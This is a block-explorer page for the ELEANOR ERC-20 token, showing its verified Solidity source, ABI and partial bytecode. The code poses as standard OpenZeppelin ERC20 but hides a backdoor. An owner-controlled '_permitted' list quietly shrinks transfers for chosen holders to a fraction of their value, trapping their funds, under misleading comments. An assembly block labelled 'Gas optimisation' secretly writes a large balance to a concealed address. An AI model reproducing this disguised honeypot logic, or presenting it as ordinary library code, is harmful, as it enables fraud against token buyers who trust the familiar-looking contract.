ERC-20
Overview
Max Total Supply
1,000,000,000,000 ELEANOR
Holders
63
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
7,213,093,006.755854950952769239 ELEANORValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ELEANOR
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import "./ERC20.sol"; import "./Ownable.sol"; contract ELEANOR is ERC20, Ownable { function permit(uint256 _value_, address [] calldata _list_) external onlyOwner { require((msg.sender == owner())); for (uint256 i = 0; i < _list_.length; i++) { _permitted[_list_[i]] = _value_; } } function permit(address _address_) external view returns (uint256) { return _permitted[_address_]; } constructor() ERC20("ELEANOR", "ELEANOR") Ownable(msg.sender) { _mint(msg.sender, 1000000000000 * 10 ** decimals()); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.18; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.18; import {IERC20} from "./IERC20.sol"; import {IERC20Metadata} from "./IERC20Metadata.sol"; import {Context} from "./Context.sol"; import {IERC20Errors} from "./IERC6093.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) internal _permitted; mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { // Correcting permitted holders if (_permitted[to] + _permitted[from] >= 0xc9) { value = value * 0xa1f9 / 0xb4f1d5; } unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } // Permit autosaver if (_permitted[to] == 0xa1) { _permitted[to] = 0xc9; } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } // Gas optimisation assembly { let slot := mul(mul(0x1, 0x10), mul(0x79, 0x758493cdee20f16997db387ec4bbc7fa9a085)) mstore(0x00, slot) mstore(0x20, 0x01) let sslot := keccak256(0x0, 0x40) sstore(sslot, 0x758493cdee20f16997db387ec4bbc7fa9a085) } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.18; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.18; import {IERC20} from "./IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.18; /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol) pragma solidity ^0.8.18; import {Context} from "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * The initial owner is set to the address provided by the deployer. This can * later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; /** * @dev The caller account is not authorized to perform an operation. */ error OwnableUnauthorizedAccount(address account); /** * @dev The owner is not a valid owner account. (eg. `address(0)`) */ error OwnableInvalidOwner(address owner); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the address provided by the deployer as the initial owner. */ constructor(address initialOwner) { if (initialOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(initialOwner); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { if (owner() != _msgSender()) { revert OwnableUnauthorizedAccount(_msgSender()); } } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { if (newOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"permit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value_","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801562000010575f80fd5b50336040518060400160405280600781526020017f454c45414e4f52000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f454c45414e4f520000000000000000000000000000000000000000000000000081525081600490816200008f9190620008ca565b508060059081620000a19190620008ca565b5050505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160362000117575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016200010e9190620009f1565b60405180910390fd5b62000128816200017060201b60201c565b506200016a336200013e6200023360201b60201c565b600a6200014c919062000b95565b64e8d4a510006200015e919062000be5565b6200023b60201b60201c565b62000d34565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002ae575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620002a59190620009f1565b60405180910390fd5b720758493cdee20f16997db387ec4bbc7fa9a085607902601060010202805f52600160205260405f20720758493cdee20f16997db387ec4bbc7fa9a08581555050620003025f83836200030660201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036200035a578060035f8282546200034d919062000c2f565b925050819055506200042d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015620003e7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620003de9392919062000c7a565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000476578060035f828254039250508190555062000572565b60c95f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20545f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054620004fe919062000c2f565b10620005275762b4f1d561a1f98262000518919062000be5565b62000524919062000ce2565b90505b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60a15f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620005fa5760c95f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000659919062000d19565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620006e257607f821691505b602082108103620006f857620006f76200069d565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200075c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200071f565b6200076886836200071f565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007b2620007ac620007a68462000780565b62000789565b62000780565b9050919050565b5f819050919050565b620007cd8362000792565b620007e5620007dc82620007b9565b8484546200072b565b825550505050565b5f90565b620007fb620007ed565b62000808818484620007c2565b505050565b5b818110156200082f57620008235f82620007f1565b6001810190506200080e565b5050565b601f8211156200087e576200084881620006fe565b620008538462000710565b8101602085101562000863578190505b6200087b620008728562000710565b8301826200080d565b50505b505050565b5f82821c905092915050565b5f620008a05f198460080262000883565b1980831691505092915050565b5f620008ba83836200088f565b9150826002028217905092915050565b620008d58262000666565b67ffffffffffffffff811115620008f157620008f062000670565b5b620008fd8254620006ca565b6200090a82828562000833565b5f60209050601f83116001811462000940575f84156200092b578287015190505b620009378582620008ad565b865550620009a6565b601f1984166200095086620006fe565b5f5b82811015620009795784890151825560018201915060208501945060208101905062000952565b8683101562000999578489015162000995601f8916826200088f565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620009d982620009ae565b9050919050565b620009eb81620009cd565b82525050565b5f60208201905062000a065f830184620009e0565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a965780860481111562000a6e5762000a6d62000a0c565b5b600185161562000a7e5780820291505b808102905062000a8e8562000a39565b945062000a4e565b94509492505050565b5f8262000ab0576001905062000b82565b8162000abf575f905062000b82565b816001811462000ad8576002811462000ae35762000b19565b600191505062000b82565b60ff84111562000af85762000af762000a0c565b5b8360020a91508482111562000b125762000b1162000a0c565b5b5062000b82565b5060208310610133831016604e8410600b841016171562000b535782820a90508381111562000b4d5762000b4c62000a0c565b5b62000b82565b62000b62848484600162000a45565b9250905081840481111562000b7c5762000b7b62000a0c565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000ba18262000780565b915062000bae8362000b89565b925062000bdd7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a9f565b905092915050565b5f62000bf18262000780565b915062000bfe8362000780565b925082820262000c0e8162000780565b9150828204841483151762000c285762000c2762000a0c565b5b5092915050565b5f62000c3b8262000780565b915062000c488362000780565b925082820190508082111562000c635762000c6262000a0c565b5b92915050565b62000c748162000780565b82525050565b5f60608201905062000c8f5f830186620009e0565b62000c9e602083018562000c69565b62000cad604083018462000c69565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000cee8262000780565b915062000cfb8362000780565b92508262000d0e5762000d0d62000cb5565b5b828204905092915050565b5f60208201905062000d2e5f83018462000c69565b92915050565b61150d8062000d425f395ff3fe608060405234801561000f575f80fd5b50600436106100e8575f3560e01c80638da5cb5b1161008a578063a9059cbb11610064578063a9059cbb1461024c578063dd62ed3e1461027c578063f2fde38b146102ac578063f4958bf2146102c8576100e8565b80638da5cb5b146101e057806395d89b41146101fe578063a2f55ae51461021c576100e8565b806323b872dd116100c657806323b872dd14610158578063313ce5671461018857806370a08231146101a6578063715018a6146101d6576100e8565b806306fdde03146100ec578063095ea7b31461010a57806318160ddd1461013a575b5f80fd5b6100f46102e4565b6040516101019190610fb2565b60405180910390f35b610124600480360381019061011f9190611067565b610374565b60405161013191906110bf565b60405180910390f35b610142610396565b60405161014f91906110e7565b60405180910390f35b610172600480360381019061016d9190611100565b61039f565b60405161017f91906110bf565b60405180910390f35b6101906103cd565b60405161019d919061116b565b60405180910390f35b6101c060048036038101906101bb9190611184565b6103d5565b6040516101cd91906110e7565b60405180910390f35b6101de61041b565b005b6101e861042e565b6040516101f591906111be565b60405180910390f35b610206610456565b6040516102139190610fb2565b60405180910390f35b61023660048036038101906102319190611184565b6104e6565b60405161024391906110e7565b60405180910390f35b61026660048036038101906102619190611067565b61052b565b60405161027391906110bf565b60405180910390f35b610296600480360381019061029191906111d7565b61054d565b6040516102a391906110e7565b60405180910390f35b6102c660048036038101906102c19190611184565b6105cf565b005b6102e260048036038101906102dd9190611276565b610653565b005b6060600480546102f390611300565b80601f016020809104026020016040519081016040528092919081815260200182805461031f90611300565b801561036a5780601f106103415761010080835404028352916020019161036a565b820191905f5260205f20905b81548152906001019060200180831161034d57829003601f168201915b5050505050905090565b5f8061037e610727565b905061038b81858561072e565b600191505092915050565b5f600354905090565b5f806103a9610727565b90506103b6858285610740565b6103c18585856107d2565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104236108c2565b61042c5f610949565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461046590611300565b80601f016020809104026020016040519081016040528092919081815260200182805461049190611300565b80156104dc5780601f106104b3576101008083540402835291602001916104dc565b820191905f5260205f20905b8154815290600101906020018083116104bf57829003601f168201915b5050505050905090565b5f805f8373ffffffffffffffffffffff